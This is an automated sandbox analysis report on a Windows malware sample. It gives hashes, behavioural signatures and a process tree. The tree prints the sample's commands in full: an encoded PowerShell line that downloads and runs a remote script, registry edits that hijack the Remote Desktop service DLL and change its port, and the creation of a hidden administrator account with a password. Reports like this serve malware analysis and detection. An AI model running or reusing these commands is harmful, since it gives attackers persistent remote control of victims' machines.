Resubmissions

02-09-2021 16:57

210902-vgpzjadhhn 10

02-09-2021 16:25

210902-tw1h5sage4 10

02-09-2021 11:31

210902-9dk89x9wb2 10

14-08-2021 13:56

210814-xdxpv1yk2x 10

Analysis

  • max time kernel
    50s
  • max time network
    117s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    14-08-2021 13:56

General

  • Target

    472208d7ba18d4c14b7e90b9db5d6feb.exe

  • Size

    5.9MB

  • MD5

    472208d7ba18d4c14b7e90b9db5d6feb

  • SHA1

    ff24cc43998ff99e61b1a838e1d51c4888498935

  • SHA256

    ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d

  • SHA512

    9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe
    "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h5gwndpi\h5gwndpi.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3713.tmp" "c:\Users\Admin\AppData\Local\Temp\h5gwndpi\CSCE88D18F7685843079321122E24848875.TMP"
          4⤵
            PID:2940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2180
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1296
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2120
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1916
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2740
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3912
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2420
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3940
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3580
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2272
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2184
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2072
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1512
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1800
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1344
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:3196
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:1376
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:508
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2180
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:1208
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc 40AuUe9q /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3296
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc 40AuUe9q /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1376
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc 40AuUe9q /add
                          3⤵
                            PID:3908
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3940
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2740
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:2636
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1296
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2496
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                              3⤵
                                PID:2272
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3912
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2480
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:1300
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc 40AuUe9q
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3180
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc 40AuUe9q
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2880
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc 40AuUe9q
                                  3⤵
                                    PID:2628
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1332
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:2180
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                  PID:3296
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:3348
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                  1⤵
                                    PID:1820
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      2⤵
                                        PID:776
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Drops file in Program Files directory
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3908

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Temp\RES3713.tmp

                                      MD5

                                      7a7c21ef2e104ca7d3f9b7bd613f37c3

                                      SHA1

                                      1a0785edf545b7ad9f269a837eab717a581d52d9

                                      SHA256

                                      cb98c79a4262bfdb9cd377214fa1b36d1a5b36801ae32f3f3750ff06f9b92656

                                      SHA512

                                      99c6f6139c4c2959d65244de127ba82490d5acdef13412d95601d633b5ece6c64a7b54f1fe9ad36534594b37efad50ee96f0e7f5fa0c5ac51ff12d58a2643371

                                    • C:\Users\Admin\AppData\Local\Temp\h5gwndpi\h5gwndpi.dll

                                      MD5

                                      302a02846f4909a4b0b0208d46e76def

                                      SHA1

                                      47352cfd86f183bb9a0e8f533834baf1b6f99ff5

                                      SHA256

                                      0201508412b3feef74b094b7763d0a55682cdc2475adc34b6b1d1b41a22744a8

                                      SHA512

                                      b4d240f5a53d2caa891c4d9c3266746aee7cbf2b9b3f9a3de10fdae20914cdf347ec1fc134920cdb6eb60b858687dcc2294f774e2c7130e415dcbb3514a6c1d0

                                    • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                      MD5

                                      3447df88de7128bdc34942334b2fab98

                                      SHA1

                                      519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                      SHA256

                                      9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                      SHA512

                                      2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                    • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

                                      MD5

                                      00fb904b2dd958760943b89400e9b7f9

                                      SHA1

                                      8c825862b6f70cbaef991525f31100f713e61e7d

                                      SHA256

                                      392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a

                                      SHA512

                                      ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

                                    • \??\c:\Users\Admin\AppData\Local\Temp\h5gwndpi\CSCE88D18F7685843079321122E24848875.TMP

                                      MD5

                                      d918465a7e97bbebd18cb7b3f397ca4e

                                      SHA1

                                      5b4f34a70c30d0d6f6dba1adb80b04b96c2e32f8

                                      SHA256

                                      c7626fbf57d4ef1244b729b4be74d1f50d8760e5c47b3ee816f3ac6847107b0f

                                      SHA512

                                      5d855df49eb6af525976a3c719049ab8a35df864c2b93838359ef8cd9187e9cd02f377a4d109adb142c9d5bd773c652f27953a1906d4558e49ee819f560314df

                                    • \??\c:\Users\Admin\AppData\Local\Temp\h5gwndpi\h5gwndpi.0.cs

                                      MD5

                                      4864fc038c0b4d61f508d402317c6e9a

                                      SHA1

                                      72171db3eea76ecff3f7f173b0de0d277b0fede7

                                      SHA256

                                      0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                      SHA512

                                      9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                    • \??\c:\Users\Admin\AppData\Local\Temp\h5gwndpi\h5gwndpi.cmdline

                                      MD5

                                      1cab44a147bebba2fecbf54cdaeb058c

                                      SHA1

                                      ec57393fdf8d33ceb2ce2c6f4d0022c960e95885

                                      SHA256

                                      0bcad8eb0a40b25452ff2538781db069805d4af6723736d770062fc4c8a15238

                                      SHA512

                                      819738d653095ba338d98dfefcb164ce90c972eec81eb9986c779b0aeb51f0c1176a034a7b131ccc431f73a41422a206c796aa38e9622e88438097f3bb945184

                                    • \Windows\Branding\mediasrv.png

                                      MD5

                                      b110f38845e18a04ab59a7d8a134ef40

                                      SHA1

                                      8119030034e6fbe62d875e824b5233c1f29d61a0

                                      SHA256

                                      1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea

                                      SHA512

                                      80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

                                    • \Windows\Branding\mediasvc.png

                                      MD5

                                      5768a809b9fcbff117dffa8cbf2e8852

                                      SHA1

                                      a056e76d15bc7509d0361175b2ae4ba348460cd6

                                      SHA256

                                      8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094

                                      SHA512

                                      99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

                                    • memory/776-362-0x0000000000000000-mapping.dmp

                                    • memory/1208-349-0x0000000000000000-mapping.dmp

                                    • memory/1296-285-0x00000256F7328000-0x00000256F732A000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1296-251-0x00000256F7320000-0x00000256F7322000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1296-238-0x0000000000000000-mapping.dmp

                                    • memory/1296-252-0x00000256F7323000-0x00000256F7325000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1296-284-0x00000256F7326000-0x00000256F7328000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1300-357-0x0000000000000000-mapping.dmp

                                    • memory/1344-345-0x0000000000000000-mapping.dmp

                                    • memory/1376-443-0x0000000000000000-mapping.dmp

                                    • memory/1376-350-0x0000000000000000-mapping.dmp

                                    • memory/1512-343-0x0000000000000000-mapping.dmp

                                    • memory/1800-344-0x0000000000000000-mapping.dmp

                                    • memory/1916-296-0x0000000000000000-mapping.dmp

                                    • memory/2072-342-0x0000000000000000-mapping.dmp

                                    • memory/2120-295-0x0000000000000000-mapping.dmp

                                    • memory/2180-159-0x0000000000000000-mapping.dmp

                                    • memory/2180-168-0x0000020E23EF0000-0x0000020E23EF2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2180-169-0x0000020E23EF3000-0x0000020E23EF5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2180-192-0x0000020E23EF6000-0x0000020E23EF8000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2180-348-0x0000000000000000-mapping.dmp

                                    • memory/2180-360-0x0000000000000000-mapping.dmp

                                    • memory/2184-341-0x0000000000000000-mapping.dmp

                                    • memory/2272-355-0x0000000000000000-mapping.dmp

                                    • memory/2272-340-0x0000000000000000-mapping.dmp

                                    • memory/2416-250-0x000001FEB78E6000-0x000001FEB78E8000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2416-209-0x000001FEB78E3000-0x000001FEB78E5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2416-208-0x000001FEB78E0000-0x000001FEB78E2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2416-201-0x0000000000000000-mapping.dmp

                                    • memory/2420-335-0x0000000000000000-mapping.dmp

                                    • memory/2480-356-0x0000000000000000-mapping.dmp

                                    • memory/2496-354-0x0000000000000000-mapping.dmp

                                    • memory/2628-359-0x0000000000000000-mapping.dmp

                                    • memory/2636-353-0x0000000000000000-mapping.dmp

                                    • memory/2740-352-0x0000000000000000-mapping.dmp

                                    • memory/2740-297-0x0000000000000000-mapping.dmp

                                    • memory/2868-136-0x0000000000000000-mapping.dmp

                                    • memory/2880-358-0x0000000000000000-mapping.dmp

                                    • memory/2940-139-0x0000000000000000-mapping.dmp

                                    • memory/3172-125-0x00000226C7EB0000-0x00000226C7EB1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3172-134-0x00000226C7EE0000-0x00000226C7EE2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3172-128-0x00000226C8170000-0x00000226C8171000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3172-152-0x00000226C7EE8000-0x00000226C7EE9000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3172-150-0x00000226C8660000-0x00000226C8661000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3172-145-0x00000226C7EE6000-0x00000226C7EE8000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3172-151-0x00000226C89F0000-0x00000226C89F1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3172-120-0x0000000000000000-mapping.dmp

                                    • memory/3172-143-0x00000226C80F0000-0x00000226C80F1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3172-135-0x00000226C7EE3000-0x00000226C7EE5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3196-442-0x0000000000000000-mapping.dmp

                                    • memory/3348-361-0x0000000000000000-mapping.dmp

                                    • memory/3580-339-0x0000000000000000-mapping.dmp

                                    • memory/3700-116-0x00000232DEE10000-0x00000232DEE12000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3700-118-0x00000232DEE15000-0x00000232DEE16000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3700-119-0x00000232DEE16000-0x00000232DEE17000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3700-114-0x00000232F92E0000-0x00000232F9700000-memory.dmp

                                      Filesize

                                      4.1MB

                                    • memory/3700-117-0x00000232DEE13000-0x00000232DEE15000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3908-351-0x0000000000000000-mapping.dmp

                                    • memory/3908-363-0x0000000000000000-mapping.dmp

                                    • memory/3908-368-0x00000233A2B70000-0x00000233A2B72000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3908-370-0x00000233A2B73000-0x00000233A2B75000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3908-378-0x00000233A2B76000-0x00000233A2B78000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3908-429-0x00000233A2B78000-0x00000233A2B79000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3912-334-0x0000000000000000-mapping.dmp

                                    • memory/3940-338-0x0000000000000000-mapping.dmp